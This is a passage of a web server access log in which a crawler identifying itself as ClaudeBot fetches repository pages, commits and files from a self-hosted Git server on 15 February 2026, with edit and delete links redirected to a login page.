+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 14740] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 926] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 12318] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 11113] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 13338] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 12417] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html?display=rendered" [Client 216.73.216.188] [Length 14567] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 12978] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/Dockerfile" [Client 216.73.216.188] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 216.73.216.188] [Length 12741] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/Dockerfile?display=source" [Client 216.73.216.188] [Length 11798] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 11029] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 14368] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 216.73.216.188] [Length 11715] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" [Client 216.73.216.188] [Length 12918] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 11634] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 216.73.216.188] [Length 37205] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 216.73.216.188] [Length 12189] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/mail_contact.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 216.73.216.188] [Length 12551] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal" [Client 216.73.216.188] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 216.73.216.188] [Length 11056] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15507] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 216.73.216.188] [Length 11232] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/mail_contact.py" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html" [Client 216.73.216.188] [Length 10924] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/quarterly" [Client 216.73.216.188] [Length 8591] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 16053] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 216.73.216.188] [Length 57778] [Gzip 10.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 15242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 11765] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/App.tsx" [Client 216.73.216.188] [Length 12974] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 20056] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 16954] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css/style.css" [Client 216.73.216.188] [Length 12632] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/mail_contact.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?state=open" [Client 216.73.216.188] [Length 7774] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/mail_contact.py" -[15/Feb/2026:08:11:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.vscode" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html" [Client 216.73.216.188] [Length 14519] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.vscode" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css/style.css" [Client 216.73.216.188] [Length 13091] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 19412] [Gzip 5.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 216.73.216.188] [Length 12763] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 216.73.216.188] [Length 11635] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/projects.sln?display=rendered" [Client 216.73.216.188] [Length 11045] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 216.73.216.188] [Length 11695] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 216.73.216.188] [Length 11525] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/semiyearly" [Client 216.73.216.188] [Length 8592] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 216.73.216.188] [Length 14872] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.TemporaryDocument" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 13019] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.TemporaryDocument" -[15/Feb/2026:08:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker" [Client 216.73.216.188] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 216.73.216.188] [Length 11113] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/settings.json" [Client 216.73.216.188] [Length 11657] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 216.73.216.188] [Length 15370] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/nginx.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?page=2&tab=activity" [Client 216.73.216.188] [Length 7322] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/nginx.conf" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 216.73.216.188] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/releases.rss" [Client 216.73.216.188] [Length 350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 216.73.216.188] [Length 190759] [Gzip 12.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 10335] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" [Client 216.73.216.188] [Length 11330] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 216.73.216.188] [Length 14348] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 216.73.216.188] [Length 16006] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 216.73.216.188] [Length 156387] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.vscode" [Client 216.73.216.188] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 216.73.216.188] [Length 13623] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 11319] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 216.73.216.188] [Length 15907] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 23859] [Gzip 9.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" 